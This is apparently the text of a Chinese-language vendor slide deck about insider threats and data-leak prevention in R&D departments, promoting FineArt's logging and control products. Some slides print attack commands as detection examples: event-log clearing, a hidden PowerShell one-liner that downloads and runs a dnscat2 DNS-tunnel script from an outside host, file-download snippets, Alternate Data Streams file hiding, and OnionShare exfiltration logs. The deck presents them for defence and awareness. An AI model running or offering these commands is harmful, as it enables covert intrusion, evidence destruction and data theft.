? FineArt - Victor Chen Top 5 - - PowerPoint PPT Presentation

fineart victor chen top 5
SMART_READER_LITE
LIVE PREVIEW

? FineArt - Victor Chen Top 5 - - PowerPoint PPT Presentation

? FineArt - Victor Chen Top 5 > The Global Risks Report 2019 14th Edition Top 5 Global Risks in Terms of Likelihood The Global


slide-1
SLIDE 1

正面迎戰內部威脅, 公司被害? 還是員工被駭?

FineArt - Victor Chen

slide-2
SLIDE 2

資安風險維持Top 5,資料外洩 > 網路攻擊

The Global Risks Report 2019 14th Edition

http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf

風險可能性 衝擊

Top 5 Global Risks in Terms of Likelihood The Global Risks Landscape 2019

slide-3
SLIDE 3

情資收集者最感興趣的六大領域

2018 Foreign Economic Espionage in Cyberspace report https://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf Industry Priority Sectors/ Technologies

Energy/ Alternative Energy (能源/替代能源)

  • Advanced pressurized

water reactor and high- temperature, gas- cooled nuclear power stations

  • Biofuels
  • Energy-efficient

industries

  • Oil, gas, and coalbed

methane development, including fracking

  • Smart grids
  • Solar energy technology
  • Wind turbines

Biotechnology (生物技術)

  • Advanced medical

devices

  • Biomanufacturing and

chemical manufacturing

  • Biomaterials
  • Biopharmaceuticals
  • Genetically modified
  • rganisms
  • Infectious disease

treatment

  • New vaccines and drugs

Defense (國防科技)

  • Aerospace &

aeronautic system

  • Armaments
  • Marin system
  • Radar
  • Optics

Environmental Protection (環境保護)

  • Batteries
  • Energy-efficient

appliances

  • Green building

materials

  • Hybrid and electric cars
  • Waste management
  • Water/air pollution control

Industry Priority Sectors/ Technologies

High-end Manufacturing (高端製造業)

  • 3D Printing
  • Advanced robotics
  • Aircraft engines
  • Aviation maintenance and

service sectors

  • Civilian aircraft
  • Electric motors
  • Foundational manufacturing

equipment

  • High-end computer

numerically controlled machines

  • High-performance

composite materials

  • High-performance sealing

materials

  • Integrated circuit

manufacturing equipment and assembly technology

  • Space infrastructure and

exploration technology

  • Synthetic rubber

Information And Communications Technology (信息通信技術)

  • Artificial intelligence
  • Big data analysis
  • Core electronics industries
  • E-commerce service
  • Foundational software

products

  • High-end computer chips
  • Internet of thing
  • Network equipment
  • Next-generation broadband

wireless communications networks

  • Quantum computing and

communications

  • Rare-earth materials
slide-4
SLIDE 4

研發部門是企業命脈,卻最難管理

slide-5
SLIDE 5

研發工程師工作環境

JTag 開發板

Servers (Data / DB)

IDE Application

Source code

RJ-45

HDL Tools Simulator In-Circuit-Test CAX / EDA tool Layout Tools / PCB

DB SVN File Test

Machine R&D

slide-6
SLIDE 6

SVS+SVT滿足研發開發工具之使用保護

System & DLL Network API CMD & Shell Hardware

  • System Call
  • Out Put File
  • Download / Upload
  • Tunnel / Cloud Application
  • Custom Protocol
  • CMD +
  • Power Shell Script
  • Run Executable(EXE)
  • Connect to Hardware Device
  • 3rd Party Application Screen / Video

Capture

  • Print Image
  • Pip Process (IPC)

IDE Application

R&D

Key Verification Screen Capture

slide-7
SLIDE 7

SVS + SVT 滿足對研發智慧財產完整保護

Prohibited/ Controlled R&D專案開發電腦 可限制多種操 作行為 列印、PrtScr、 IPC CTRL-C + CTRL-V Controlled SVT Allowed 可正常使用 SVN、開發板 可限制貼出字數

slide-8
SLIDE 8

Demo 1 Visual Studio 寫出保護,系統防守

Visual Studio寫出儲存時,即受到保護 Visual Studio政策防守:Prohibited Call System 可以依據各產業別特殊工具進行防守與管控,確保智慧資產不會外洩。

slide-9
SLIDE 9

指令環境下的風險,資安與稽核知多少?

slide-10
SLIDE 10

IT資安與稽核應了解研發單位的應用

System & DLL Network API CMD & Shell Hardware

  • System Call
  • Out Put File
  • Download / Upload
  • Tunnel / Cloud Application
  • Custom Protocol
  • CMD +
  • Power Shell Script
  • Run Executable(EXE)
  • Connect to Hardware Device
  • 3rd Party Application Screen / Video

Capture

  • Print Image
  • Pip Process (IPC)

IDE Application

R&D

Key Verification Screen Capture

slide-11
SLIDE 11

OS default Function & AP IDE Call Command

3rd Party

Application

  • Cmd.exe
  • Windows PowerShell
  • PowerShell ISE
  • Call cmd.exe
  • Call PowerShell
  • Call exe
  • ConEmu
  • PSReadLine
  • PSGet
  • Chocolatey
  • Babun (optional)
  • Cmder
  • Git Bash by MinGW & MinTTY
  • WSL ubuntu on windows
  • Cygwin
  • Xshell
  • Console2
  • Powershell ise
  • Powershell
  • Dell powerGUI
  • Sapien Powershell studio
  • AWS tools for Powershell
  • Adam driscoll's powershell
  • Powershell web access,
  • Master-powershell
  • Vmware vsphere powerCLI

CMD 與PowerShell 環境分析

{ }

SDK Command

cmd軌跡記錄 SVS 安全碟 軟體安控 程序記錄 網路行為記錄 SVT 加密通道

slide-12
SLIDE 12

從小處可以一窺指令軌跡記錄的重要性

Clear-EventLog -LogName System Clear-EventLog -LogName Security Clear-EventLog -LogName Application

DNS Tunnel with PowerShell

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/ dnscat2- powershell/master/dnscat2.ps1’); Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

PowerShell Dodge 3 ways to download files with PowerShell Code Obfuscator

–WindowStyle hidden / -w hidden –Exec Bypass –Command / -c –EncodedCommand / -e / -Enc –Nop / -Noprofile Invoke-WebRequest $url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt" $output = "$PSScriptRoot\real.ps1" $start_time = Get-Date $readteam = New-Object System.Net.WebClient $ readteam.DownloadFile($url, $output) Crunchcode (VBA) ScriptCryptor (VBA, JavaScript) CodeProtection (VBA) Vbad (VBA) Stunnix (C++, Perl, JavaScript, VBScript ) Scripts Encryptor (HTML,JavaScript/JScript, C/C++/MFC) ISESteroids(PowerShell) System.Net.WebClient −(New-object System.net.webclient).DownlodFile() −(New-object System.net.Webclient).DownloadString() Start-BitsTransfer Start-BitsTransfer -Source $url -Destination $output - Asynchronous Write-Output "Time taken: $((Get- Date).Subtract($start_time).Seconds) second(s)"

Clean all event-log

dnscat2.ps1

slide-13
SLIDE 13

Demo 2 各類指令行為軌跡記錄

Invoke-Obfuscation Teensy + Alternate Data Streams (ADS)

+

記錄時間 使用者帳號 應用程式名稱 命令內容 部門名稱 使用者全名 電腦名稱 IP PID 伺服器儲存時間 2019/03/12 DEMO01 powershell.exe Import-Module ./Invoke-Obfusca IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Invoke-Obfuscation-masterIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe copy c:\User\user\Desktop\XCons IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12 記錄時間 使用者帳號 應用程式名稱 命令內容 部門名稱 使用者全名 電腦名稱 IP PID 伺服器儲存時間 2019/03/12 DEMO01 CMD.exe wordpad fake.docx:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpad fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe wordpade f wordpade fake.docxIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe DEL AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe WMIC DATAFILE WHERE DRIVEIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe TYPE AI.DOCX>>FAKE.DOCX:AI.IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe COPY D:AI.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe COPY D:FAKE.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 CMD.exe FORMAT E: /FS:NTFS /Q /V:ads IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12 2019/03/12 DEMO01 cmd.exe ipconfig IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 8708 2019/03/12

slide-14
SLIDE 14

內部網路活動,資安有風險?

slide-15
SLIDE 15

分析企業網路架構

  • 1. 阻斷外部網路服務
  • 2. 部分開放外部網路服務 (實體隔離)
  • 3. 開放外部網路服務

外部網 路服務 內部網 路服務 企業組織 網路型態

外部 DNS 官網 外部 郵件 內部 DNS 主管資 訊系統 內部 郵件 其他 安全防護與 網路架構

各類型 防火牆 VPN

雲端 架構 資料 倉儲 端點 裝置 分點網 路架構

外部 裝置

無人 看管 出差 裝置 行動 裝置

VoIP WiFi

SVN CRM ERP

slide-16
SLIDE 16

端點網路活動,找出風險

Role IP/Domain Channel Port Protocol Action Software Interested Time

  • 1. 員工
  • 2. 駭客
  • 3. OS
  • 4. 程序

Internet Intranet Localhost X 白名單 黑名單 風險目標 觀察名單 X 來源/目的 Normal Proxy Tunnel SVT 白名單 黑名單 警示通訊埠 TCP UDP DNS 其他自 訂協定 拷貝/刪除 更名/複製 搬移檔案 上傳檔案 貼出文字 拖拉檔案 IM FTP P2P TorNet 檔案大小 檔案數量 頻率規則 檔案變動 檔案名稱 檔案Hash 上班時間 下班時間 半夜

人 地 事 物 時

內部網 路服務

內部 DNS

主管資 訊系統

內部 郵件 資料 倉儲 端點 裝置

SVN CRM ERP

slide-17
SLIDE 17

Takeafile & Onion Share 2.0 防守與網路記錄

阻擋所有拖曳檔案到瀏覽器 禁止應用程式執行&阻擋拖曳檔案到瀏覽器

記錄網路連結行為,目的地洋蔥網路 記錄網路連結行為(UDP)

https://takeafile.com/

瀏覽日期 使用者帳號 IP 網址 瀏覽器名稱 2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxcc

  • nionshare-gui.exe

Time Source Destination Protocol Length Info 5.154527 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data 5.154641 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data 5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data 5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data 5.154649 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data 5.154703 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data

slide-18
SLIDE 18

企業防洩密。資安找精品

www.fineart-tech.com